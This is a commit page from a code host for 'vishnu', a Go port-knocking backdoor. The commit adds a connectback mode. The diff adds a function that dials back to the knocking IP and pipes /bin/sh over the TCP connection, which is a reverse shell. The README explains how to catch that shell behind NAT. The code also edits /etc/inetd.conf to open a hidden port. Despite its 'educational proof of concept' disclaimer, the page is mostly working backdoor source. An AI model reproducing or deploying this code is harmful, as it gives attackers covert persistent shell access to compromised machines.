Spencer/vishnu
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

add connectback mode

Browse Source
This commit is contained in:
Michael Vaughan
2022-01-09 14:45:48 -05:00
parent 9800c27a1b
commit 22bd171780
2 changed files with 78 additions and 11 deletions
Download Patch File Download Diff File Expand all files Collapse all files

20
README.md
View File

@@ -19,18 +19,32 @@ After the comparison is done and matches, a random port between 100 and 65535 wi
targetInterface is the interface you want to be listening on. To be more district, you can also change the secretPorts to whatever you want. targetInterface is the interface you want to be listening on. To be more district, you can also change the secretPorts to whatever you want.
``` ```
var targetInterface = "ens160" var (
var secretPorts = []int{1, 2, 3, 4} targetInterface = "ens160"
secretPorts = []int{1, 2, 3, 4}
)
``` ```
To compile, you need libpcap. On linux, you can install by running `sudo apt install libpcap-dev`. Then you can run `go build src/vishnu.go` to generate a binary. To compile, you need libpcap. On linux, you can install by running `sudo apt install libpcap-dev`. Then you can run `go build src/vishnu.go` to generate a binary.
For the port opening, make sure you have `inetd` installed. If you are not sure, run `apt install openbsd-inetd`. For the port opening, make sure you have `inetd` installed. If you are not sure, run `apt install openbsd-inetd`.
## Connectback Shell
You can optionally have the backdoor operate in connectback mode - where after successfully knocking a shell is sent back to the knocking IP on a predetermined port.
Be careful doing this behind NAT as while knocking will work, the shell won't get back to you. You'll need to do port forwarding or listen for the shell on a public IP.
```
const (
connectback = true
connectbackPort = "8080"
)
```
# Potential future works # Potential future works
* Design it to work for multiple operation systems(https://haydz.github.io/2020/07/06/Go-Windows-NIC.html ) * Design it to work for multiple operation systems(https://haydz.github.io/2020/07/06/Go-Windows-NIC.html )
* Dynamic secret ports so they are predictable. * Dynamic secret ports so they are predictable.
# Disclamers # Disclamers
The author is in no way responsible for any illegal use of this software. It is provided purely as an educational proof of concept. I am also not responsible for any damages or mishaps that may happen in the course of using this software. Use at your own risk. The author is in no way responsible for any illegal use of this software. It is provided purely as an educational proof of concept. I am also not responsible for any damages or mishaps that may happen in the course of using this software. Use at your own risk.

69
src/vishnu.go
View File

@@ -1,9 +1,11 @@
package main package main
import ( import (
"errors"
"fmt" "fmt"
"log" "log"
"math/rand" "math/rand"
"net"
"os" "os"
"os/exec" "os/exec"
"strconv" "strconv"
@@ -13,11 +15,26 @@ import (
"github.com/google/gopacket/pcap" "github.com/google/gopacket/pcap"
) )
var targetInterface = "ens160" var (
var snaplen = int32(1600) targetInterface = "ens160"
var filter = "tcp" snaplen = int32(1600)
var secretPorts = []int{1, 2, 3, 4} // vishnu uses tcp port knocking
var secretCounter = 0 filter = "tcp"
// ports in order to port knock on
secretPorts = []int{1, 2, 3, 4}
// how far into the sequence we are
// when secretCounter == len(secretPorts),
// port knocking is complete and shell is given
secretCounter = 0
)
const (
// if true, connect back to knocking
// IP on connectbackPort
connectback = false
// only relevant if connectback is true
connectbackPort = "8080"
)
func main() { func main() {
// Read package and analze them // Read package and analze them
@@ -38,6 +55,16 @@ func errorPrinter(err error) {
} }
} }
func grabRemoteIP(packet gopacket.Packet) (string, error) {
iplayer := packet.Layer(layers.LayerTypeIPv4)
if iplayer == nil {
return "", errors.New("Packet is not IPv4")
}
ip, _ := iplayer.(*layers.IPv4)
return ip.SrcIP.String(), nil
}
func printPacketInfo(packet gopacket.Packet) { func printPacketInfo(packet gopacket.Packet) {
// Let's see if the packet is TCP // Let's see if the packet is TCP
@@ -59,9 +86,17 @@ func printPacketInfo(packet gopacket.Packet) {
} }
if secretCounter == len(secretPorts) { if secretCounter == len(secretPorts) {
// open the gateway
go vishnu()
secretCounter = 0 secretCounter = 0
// grab IP address
ip, err := grabRemoteIP(packet)
// TODO maybe just listen if connectback is
// on and we can't get the remote IP
if connectback && err != nil {
return
}
// open the gateway
go vishnu(ip)
} }
// Check for errors // Check for errors
@@ -70,7 +105,25 @@ func printPacketInfo(packet gopacket.Packet) {
} }
} }
func vishnu() { func connectBack(ip string) {
// TODO make this a PTY shell instead
addr := net.JoinHostPort(ip, connectbackPort)
conn, err := net.Dial("tcp", addr)
if err != nil {
// TODO: figure out error handling
return
}
cmd := exec.Command("/bin/sh")
cmd.Stdin, cmd.Stdout, cmd.Stderr = conn, conn, conn
cmd.Run()
conn.Close()
}
func vishnu(ip string) {
if connectback {
connectBack(ip)
}
randomPort := rand.Intn(65535-100) + 100 randomPort := rand.Intn(65535-100) + 100
// println("The doors are open on port ", strconv.Itoa(randomPort)) // println("The doors are open on port ", strconv.Itoa(randomPort))
// Append to a file /etc/inetd.conf // Append to a file /etc/inetd.conf